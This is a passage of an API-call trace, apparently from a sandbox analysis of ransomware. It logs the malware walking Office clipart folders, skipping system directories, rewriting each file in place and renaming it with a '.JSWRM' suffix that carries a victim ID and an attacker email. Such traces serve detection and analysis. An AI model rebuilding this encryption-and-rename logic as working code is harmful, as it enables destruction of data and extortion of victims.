(in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0095.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.457] CloseHandle (hObject=0x314) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0095.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0095.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0095.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0095.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0095.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL01041_.WMF", cAlternateFileName="")) returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2=".") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="..") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="...") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="windows") returned -1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="recovery") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="perflogs") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="documents and settings") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="system volume information") returned -1 [0095.459] lstrcmpiW (lpString1="SL01041_.WMF", lpString2="msocache") returned 1 [0095.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01041_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01041_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01041_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0095.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01041_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01041_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01041_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0095.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.460] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1548) returned 1 [0095.460] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x600) returned 0x2332c0 [0095.461] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0095.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.462] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0095.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0095.462] CloseHandle (hObject=0x314) returned 1 [0095.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0095.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0095.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0095.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.463] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL01394_.WMF", cAlternateFileName="")) returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2=".") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="..") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="...") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="windows") returned -1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="recovery") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="perflogs") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="documents and settings") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="system volume information") returned -1 [0095.464] lstrcmpiW (lpString1="SL01394_.WMF", lpString2="msocache") returned 1 [0095.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01394_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01394_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01394_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01394_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01394_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01394_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6916) returned 1 [0095.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x205850 [0095.465] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b00, lpOverlapped=0x0) returned 1 [0095.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.467] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b00, lpOverlapped=0x0) returned 1 [0095.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.467] CloseHandle (hObject=0x314) returned 1 [0095.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0095.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0095.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0095.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0095.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL01395_.WMF", cAlternateFileName="")) returned 1 [0095.468] lstrcmpiW (lpString1="SL01395_.WMF", lpString2=".") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="..") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="...") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="windows") returned -1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="recovery") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="perflogs") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="documents and settings") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="system volume information") returned -1 [0095.469] lstrcmpiW (lpString1="SL01395_.WMF", lpString2="msocache") returned 1 [0095.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01395_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01395_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01395_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01395_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01395_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01395_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0095.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.470] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5004) returned 1 [0095.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x205850 [0095.470] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0095.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.472] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0095.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.472] CloseHandle (hObject=0x314) returned 1 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0095.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0095.473] HeapFree (in: 